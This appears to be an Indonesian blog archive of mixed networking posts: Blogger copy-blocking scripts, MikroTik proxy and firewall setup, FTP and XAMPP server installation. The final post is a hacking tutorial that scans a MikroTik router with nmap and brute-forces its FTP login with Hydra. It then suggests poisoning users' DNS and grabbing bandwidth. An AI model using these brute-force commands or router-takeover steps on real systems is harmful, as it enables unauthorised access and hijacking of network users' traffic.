Sabtu, 15 September 2012

Menonaktifkan klik kanan mouse pada blogger

Klik kanan atau right click terkadang sering digunakan untuk kopi paste,seperti saya misalnya he he he..:-) Setelah dipasang kode 'Disable Right Click pada blogger' anda setiap pengunjung atau anda sendiri akan kesulitan melakukan klik kanan, jika demikian isi dari halaman blog anda, artikel dan gambar tidak bisa di copy atau disalin.
Bagaimana cara memasang kode Disable Right Click pada Blogger, berikut langkah-langkahnya:
Copy kode berikut ini kemudian masuk ke draft blogger - design - page element - add a gadget - HTML/javaScript - save.

<SCRIPT language=JavaScript>
var message = "No Right Click";
function rtclickcheck(keyp){ if (navigator.appName == "Netscape" && keyp.which == 3){ alert(message); return false; }
if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) { alert(message); return false; } }
document.onmousedown = rtclickcheck;
</SCRIPT>

Untuk merubah pesan apabila pengunjung melakukan klik kanan anda boleh merubah text 'No Right Click' di atas sesuai keinginan anda.

Membuat Anti Copy Paste Di Blog

Membuat Anti Copy Paste Di Blog,Cara ini sebenarnya sudah banyak di share, tapi sebagai arsip di blog ini, saya posting kembali. Cara kerja script ini adalah menonaktifkan fungsi blok pada posting sehingga copy paste terhadap blog kita dapat diminimalisir. Tapi saya sarankan jika blog sobat bertema "blog tutorial" sebaiknya jangan menggunakan script ini, karena script/kode yang ada pada tutorial sobat tidak akan bisa di blok. Baik agar tidak bertele-tele langsung saya terangkan :


Membuat Anti Copy Paste Di Blog,script Anti Copy Paste

Membuat Anti Copy Paste Di Blog sebagai berikut:
  1. Login ke blogger, klik rancangan, Pilih tab Edit HTML, Ingat centang Expand Widget Template
  2. Cari kode </head> (gunakan ctrl+f)
  3. Copy paste script berikut tepat di bawah kode</head>
    <SCRIPT type="text/javascript">
    if (typeof document.onselectstart!="undefined") {
    document.onselectstart=new Function ("return false");
    }
    else{
    document.onmousedown=new Function ("return false");
    document.onmouseup=new Function ("return true");
    }
    </SCRIPT>
  4. Simpan template dan lihatlah hasilnya

Cara Setting Web Proxy Mikrotik Warnet


Setting warnetnya menggunakan Proxy server, yang selama ini warnetnya tanpa menggunakan Proxy server.
Asumsinya ketika client1 mengakses website A maka proses yang terjadi adalah client1 meminta/request ke web server yang mempunyai website A tersebut. Ketika client2 atau yang lain mengakses website yang sama (website A) maka proses client tersebut akan mengulang kembali proses meminta/request ke web server tersebut. Seandainya ada banyak client lain yang mengakses website yang sama (website A) maka proses yang sama akan dilakukan lagi. nah inilah yang membuat akses terasa lambat.
Disinilah peran sebuah Proxy sangat dibutuhkan untuk mempercepat akses website. 

Suatu halaman website yang pernah dikunjungi oleh client akan disimpan (cache) di server proxy. Ketika ada client yang meminta/request suatu website maka client tidak langsung request ke webserver. client akan mencari website yang direquest-nya ke proxy dulu, kalo ada maka proxy akan menjawab request tersebut dan memberikannya ke client, jika website yang dicari tidak ditemukan di simpanan/Cache proxy barulah proxy server request website tersebut ke webserver dituju.
Spek PC : P3 800 Mhz, Mem 512, HD 30 Gb, 2 buah LAN Card (1 LAN onboard, 1 LAN tambahan)
OS : Mikrotik OS 2.29.XX ( crack version ) orignal recomende
ISP / WISP : 
Client : 3 - 10 komputer
Konfigurasi Mikrotik :
#1. Setting Interface LAN card
/interface
set ether1 name=modem
set ether2 name=lan
keterangan:
ether1 diganti nama (interface) menjadi modem (koneksi dari dan ke modem)
ether2 diganti nama (interface) menjadi lan (koneksi dari dan ke jaringan LAN)
tujuannya biar mudah di ingat gak ada pengaruh ke akses-nya.
#2. Setting IP address
/ip address
add address=192.168.1.2/24 interface=modem
add address=192.168.10.1/24 interface=lan
keterangan :
ip address standart (umumnya) modem 192.168.1.1 jadi ip interface dari-ke modem antara 192.168.1.2-254
#3. Setting Gateway
/ip route
/add gateway=192.168.1.1
#4. Setting DNS
/ip dns
set primary-dns=202.134.1.10
set secondary-dns=203.130.196.155
set allow-remote-requests=yes
Keterangan :
DNS digunakan untuk menerjemahkan alamat IP ke domain (****.com, ****.net, dll) atau sebaliknya, ada beberapa DNS untuk speedy pilih yang latency-nya kecil dengan nge-ping agar akses ke dns-nya agak cepat dikit.
#5. Setting NAT
/ip firewall nat
add chain=srcnat action=masquerade out-interface=modem
keterangan :
Network Address Translation (NAT) fasilitas router untuk meneruskan paket dari ip asal dan atau ke ip tujuan dan merupakan standart internet yang mengizinkan komputer host dapat berkomunikasi dengan jaringan luar menggunakan ip address public.
#6. Setting web Proxy (transparent)
/ip web-proxy
set enabled=yes
set hostname=....... ( terserah )
set transparent-proxy=yes
set cache-administrator=admin@........ ( terserah )
Keterangan :
settingan web proxy yang lain menggunakan default bawaan mikrotik.
hostname=hostname dns atau ip address web proxy
cache-administrator=email admin yang bisa dihubungi ketika proxy error, yang akan ditampilkan pada browser client ketika proxy error.
#7. Setting redirect ke proxy
/ip firewall nat
add chain=dstnat protocol=tcp dst-port=80 action=redirect to-port=3128
keterangan :
Redirect digunakan untuk membelokkan/memaksa koneksi port 80 (www/web) dari client ke port 3128 default-nya web proxy mikrotik, jadi semua request client yang menggunakan port 80 (www/web) akan di belokkan ke web proxy mikrotik.
#8. Memonitor web proxy
/ip web-proxy
monitor interval=1
keterangan :
memonitor penggunaan web proxy mikrotik dengan interval waktu 1 detik
Hasilnya : memuaskan dan bikin puas…puas…!
Untuk jaringan yang besar dan client banyak sebaiknya menggunakan Squid di linux.
Selamat Mencoba.
Jangan lupa tinggalkan pesan.....
Sumber: qnetakses.blogspot.com

Archive for category Linux

Instalasi FTP Server di Linux untuk managemen files di web server


Beberapa artikel sebelum sudah beberapa tentang hacking, disini penulis mencoba mengisi artikel yang lebih umum yaitu instalasi FTP Server di linux dan konfigurasi dasarnya. Disini penulis mencoba mengkonfigurasi untuk managemen files web di LAMPP, diasumsikan web server telah diinstall, jika anda belum mengetahui caranya instalasi LAMPP maka dapat dicari di blog ini, hanya saja penulis waktu itu menggunakan Mandriva, tapi intinya sama saja karena hanya extract dari file lampp, lalu konfigurasi sesuai kebutuhan, lalu jalankan lamppnya.
Disini penulis menggunakan Ubuntu 10.0.4 dan FTP Servernya yang diinstall adalah proftpd.
Perintah install dengan apt-get.
kurniawan@kurniawan-laptop:~$ sudo apt-get install proftpd
[sudo] password for kurniawan:
Reading package lists… Done
Building dependency tree
Reading state information… Done
Note, selecting proftpd-basic instead of proftpd
The following extra packages will be installed:
openbsd-inetd proftpd-basic
Suggested packages:
proftpd-doc proftpd-mod-mysql proftpd-mod-pgsql proftpd-mod-ldap
proftpd-mod-odbc proftpd-mod-sqlite
The following NEW packages will be installed:
openbsd-inetd proftpd-basic
0 upgraded, 2 newly installed, 0 to remove and 429 not upgraded.
Need to get 904kB of archives.
After this operation, 2,335kB of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://na.archive.ubuntu.com/ubuntu/ lucid/main openbsd-inetd 0.20080125-4ubuntu2 [37.0kB]
Get:2 http://na.archive.ubuntu.com/ubuntu/ lucid-updates/universe proftpd-basic 1.3.2c-1ubuntu0.1 [867kB]
Fetched 904kB in 22s (40.0kB/s)
Preconfiguring packages …
Selecting previously deselected package openbsd-inetd.
(Reading database … 122714 files and directories currently installed.)
Unpacking openbsd-inetd (from …/openbsd-inetd_0.20080125-4ubuntu2_i386.deb) …
Selecting previously deselected package proftpd-basic.
Unpacking proftpd-basic (from …/proftpd-basic_1.3.2c-1ubuntu0.1_i386.deb) …
Processing triggers for man-db …
Processing triggers for ureadahead …
ureadahead will be reprofiled on next reboot
Setting up openbsd-inetd (0.20080125-4ubuntu2) …
* Stopping internet superserver inetd                                   [ OK ]
* Not starting internet superserver: no services enabled
Setting up proftpd-basic (1.3.2c-1ubuntu0.1) …
Warning: The home dir /var/run/proftpd you specified can’t be accessed: No such file or directory
Adding system user `proftpd’ (UID 115) …
Adding new user `proftpd’ (UID 115) with group `nogroup’ …
Not creating home directory `/var/run/proftpd’.
Adding system user `ftp’ (UID 116) …
Adding new user `ftp’ (UID 116) with group `nogroup’ …
Creating home directory `/home/ftp’ …
Untuk lebih enaknya penulis login root saja dengan sudo su. Setelah itu penulis konfigurasi proftpd.conf nya untuk konfigurasi.
root@kurniawan-laptop:/# cd /etc/proftpd
root@kurniawan-laptop:/etc/proftpd# nano proftpd.conf
Jika LAMPP kita diinstall di opt/lampp maka kita masukkan konfigurasi dibawah ini
#defaultroot ~
Defaultroot /opt/lampp/htdocs
Setelah itu save
Setelah direstart tinggal kita restart proftpdnya.
root@kurniawan-laptop:/etc/init.d# sudo /etc/init.d/proftpd restart
* Stopping ftp server proftpd                                           [ OK ]
* Starting ftp server proftpd
Kalau sudah tinggal kita mencoba koneksi dengan FTP client.

Disini kita sudah di /opt/lampp/htdocs, disini kita bisa manage folder dan file-file di web server kita.
Jika anda pengguna speedy yang gatewaynya dari router modem dan ingin di onlinekan ke internet maka tinggal kita set saja di router modemnya, bisa seperti di bawah ini.

I

Setting Anti Netcute Dengan Mikrotik

Sedikit share tentang blok netcut di mikrotik dengan menggunakan rule berikut ini, sobat tinggal copas script dibawah ini di new terminal winbox. Sebaiknya copas dulu di notepad untuk menyesuaikannya dengan settingan di mikrotik sobat....



berikut scriptnya:
 /ip firewall filter
add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 protocol=tcp src-address=61.213.183.1-61.213.183.254
add action=accept chain=input disabled=no dst-port=0-65535 protocol=tcp src-address=67.195.134.1-67.195.134.254
add action=accept chain=input disabled=no dst-port=0-65535 protocol=tcp src-address=68.142.233.1-68.142.233.254
add action=accept chain=input disabled=no dst-port=0-65535 protocol=tcp src-address=68.180.217.1-68.180.217.254
add action=accept chain=input disabled=no dst-port=0-65535 protocol=tcp src-address=203.84.204.1-203.84.204.254
add action=accept chain=input disabled=no dst-port=0-65535 protocol=tcp src-address=69.63.176.1-69.63.176.254
add action=accept chain=input disabled=no dst-port=0-65535 protocol=tcp src-address=69.63.181.1-69.63.181.254
add action=accept chain=input disabled=no dst-port=0-65535 protocol=tcp src-address=63.245.209.1-63.245.209.254
add action=accept chain=input disabled=no dst-port=0-65535 protocol=tcp src-address=63.245.213.1-63.245.213.254

Membangun web server di linux hingga sisi pengamanannya

x
Penulis mengenal linux kurang lebih sekitar tahun 2003 ahkir atau 2004 awal, sebelumnya sejak tahun 1994 penulis hanya menggunakan OS dari microsoft beserta aplikasi-aplikasi yang berjalan di OS tersebut. Distro Linux pertama penulis adalah Mandrake karena distro ini membantu penulis memenangkan 2 kompetisi web hacking di salah satu PTS dan PTN Jogja dengan meraih juara 1 di tahun 2004, penulis memanfaatkan browser-browser di mandrake untuk menguji tampilan web yang penulis buat. Thanks mandrake.
Untuk seterusnya penulis lebih banyak fokus di mandriva yang merupakan penerus dari mandrake selain juga di Windows, walaupun begitu penulis juga pengguna ubuntu tapi penulis menggunakan ubuntu bukan di gunakan tapi sebagai latihan target hacking, seperti misal untuk hacking web, ngeroot dan sebagainya.
Di sini penulis hendak memberikan tutorial sederhana bagaimana membuat instalasi XAMPP (Web Server dan DB), keamanan dasar hingga sampai pengamanan untuk melindungi real mesinnya.
Pertama-tama anda install program untuk OS Virtual, di sini penulis menggunakan virtual Box, setelah anda install maka buat virtual mesin baru, contohnya namanya mandriva, setelah dibuat maka konfigurasi yang diperlukan, untuk konfigurasi jaringan anda buat dalam mode bridge, setelah konfigurasi selesai maka anda install OS Mandriva, setelah selesai diinstall dan melakukan konfigurasi yang disesuaikan dengan kebutuhan di Mandriva, setelah itu, untuk Web Server dan DB Servernya anda dapat mendownload XAMPP atau mengcopy dari real mesinnya yang sudah ada.
Di sini diasumsikan anda sudah mengcopy file xampp-linux-x.x.x.tar.gz ke mandriva anda, disini penulis menggunakan XAMPP lama, yang baru dapat anda download di situs resminya.
[kurniawan@localhost ~]$ su
Password:
[root@localhost kurniawan]# ls
Desktop/ Documents/ Download/ Music/ Pictures/ tmp/ Videos/
[root@localhost kurniawan]# cd Download
[root@localhost Download]# ls
xampp-linux-1.6.7.tar.gz*
[root@localhost Download]# tar xvzf xampp-linux-1.6.7.tar.gz -C /opt
Setelah selesai
[root@localhost Download]# cd /opt
[root@localhost opt]# ls
lampp/
[root@localhost opt]# cd lampp
[root@localhost lampp]# ls
backup/ error/ icons/ libexec/ modules/ RELEASENOTES tmp/
bin/ etc/ lampp* licenses/ phpmyadmin/ sbin/ var/
cgi-bin/ htdocs/ lib/ logs/ phpsqliteadmin/ share/
[root@localhost lampp]# ./lampp start
Starting XAMPP for Linux 1.6.7…
XAMPP: Starting Apache with SSL (and PHP5)…
XAMPP: Starting MySQL…
XAMPP: Starting ProFTPD…
XAMPP for Linux started.
[root@localhost lampp]#
Setelah itu anda masuk ke firewall mandriva anda berikan akses kepada web server agar dapat dibuka oleh komputer diluar.
[root@localhost phpmyadmin]# cd ..
[root@localhost lampp]# cd phpmyadmin
[root@localhost phpmyadmin]# vi config.inc.php
tp
Anda ganti pada inputan untuk auth type dari config menjadi http, seperti di atas hasil jadinya.
Keterangan untuk vi
x untuk menghapus
Insert untuk mengedit, setelah selesai tekan Esc
:w untuk menyimpan
:q untuk keluar
Setelah itu jangan lupa diganti passwordnya, caranya http://localhost/phpmyadmin, masukkan username root, password tidak perlu diisi lalu klik ok, masuk ke privileges lalu lakukan edit pada User root, cari bagian change password, masukkan passwordnya, lalu klik Go.
Untuk konfigurasi pada PHP.INI, periksa di http://localhost lalu pilih english saja, lalu cari phpinfo() lalu periksa Loaded Configuration File itu ada pada direktori mana.
Untuk yang penulis install ada di /opt/lampp/etc/php.ini maka
[root@localhost lampp]# cd etc
[root@localhost etc]# vi php.ini
tp
Setting konfigurasinya sesuai kebutuhan, misal untuk menghindari serangan LFI dan RFI maka pengamanan dari sisi konfigurasi Web server pada PHP.INI : allow_url_include = off, allow_url_fopen = off, magic_quotes_gpc= on tapi walaupun begitu anda juga harus lihat aplikasi webnya membutuhkan fitur itu atau tidak, jika iya maka tetap gunakan tapi anda amankan dari sisi scripting di PHP sehingga konfigurasi selain melihat dari sisi kebutuhan juga memperhatikan sisi keamanan.
Setelah selesai instalasi, disini penulis asumsikan koneksi internet anda adalah Speedy dan dengan IP address lokal di mesin virtual dengan OS mandriva adalah 192.168.1.12 maka cukup anda setting di router modem ADSL anda sebagai berikut :
Pada router modem untuk TP-LINK masuk ke Advanced Setup lalu pilih NAT lalu klik Virtual Server.
tp
Setelah itu muncul tampilan seperti dibawah ini, rule index 1 artinya untuk rule nomor 1, bawahnya aplikasinya apa yang digunakan karena ke web server maka penulis isi web saja, protocol penulis pilih all, start port number 80 dan di ahkir 80, Local IP Address dapat diisi sesuai IP lokal yang ada di mesin virtual yang akan diarahkan
tp
Dengan melakukan IP dan Port Forwarding seperti di atas maka saat IP publik dengan port 80 di panggil maka router akan langsung mengarahkannya IP lokal dengan port 80 ke mesin virtual. Untuk hal-hal yang sifatnya maintenance seperti remote desktop dan semacamnya dapat anda berikan ke real mesin sehingga jika misal pada mesin virtual bermasalah maka anda masih bisa manage mesin virtualnya dari jarak jauh dengan lebih mudah dan cepat.
Jika anda menggunakan Speedy dengan IP Public yang dynamic maka anda dapat menggunakan layanan sub domain gratis, misalnya http://www.no-ip.com, dengan sub domain maka otomatis sub domain akan menyesuaikan dengan IP publk speedy anda yang berubah-berubah maka ini mempermudah orang diluar juga anda untuk membuka web server anda.

Cara Setting Mikrotik Winbox

Mikrotik saat ini sudah menjadi sebuah fenomena di kalangan pangusaha warnet maupun staff  IT di berbagai perusahaan. Dikarenakan tampilannya yang mudah dan simple, maka tak heran jika saat ini orang berbondong-bondong untuk migrasi dari dominasi router Linux ke Operation system yang satu ini.
Jadi bagi orang yang belum familiar pun terhadap mikrotik, serasa tak akan menemukan kesulitan yang berarti. Adalah tampilan winbox yang mempermudah untuk seting perangkat ini. Berikut ini saya jelaskan secara simple cara seting mikrotik menggunakan winbox.
1. Buka program winbox pada komputer anda sampai masuk ke dalam system     mikrotik, lalu create Ip address untuk ether1 (speedy) dan ether2 untuk klient (dalam percobaan ini saya menggunakan ether3)


2. Buatlah gateway untuk koneksi anda (dalam hal ini adalah ip modem speedy anda)

3. Buatlah perintah Nat, pada menu IP–firewall–Nat

4. Isikan Ip Dns Speedy pada mikrotik anda pada menu Ip–Dns–Setting

Nah setingan sudah selesai, simpel bukan? Silahkan Mencoba

Hacking password Mikrotik secara langsung dengan memanfaatkan titik terlemah

Tidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.
Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata bisa. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi? :)
Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.
Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik
C:\Documents and Settings\serverdata>nmap -A 192.168.1.174
Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time
Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        MikroTik router ftpd 3.20
22/tcp   open  ssh        OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp   open  telnet     Linux telnetd
80/tcp   open  http       MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open  winbox     MikroTik WinBox management console
8080/tcp open  http-proxy Mikrotik http proxy
8291/tcp open  unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
HOP RTT     ADDRESS
1   0.13 ms 192.168.1.174
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
Ternyata banyak port dan service yang terbuka di mikrotik. :D
Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.
C:\Documents and Settings\serverdata>
H:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174   login: admin   password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Saat login dan exploitasi yang dapat dilakukan.
Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router. :D
Ingin dapat bandwidth full ? :D
Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.

Oke, sekian dulu, cayooo.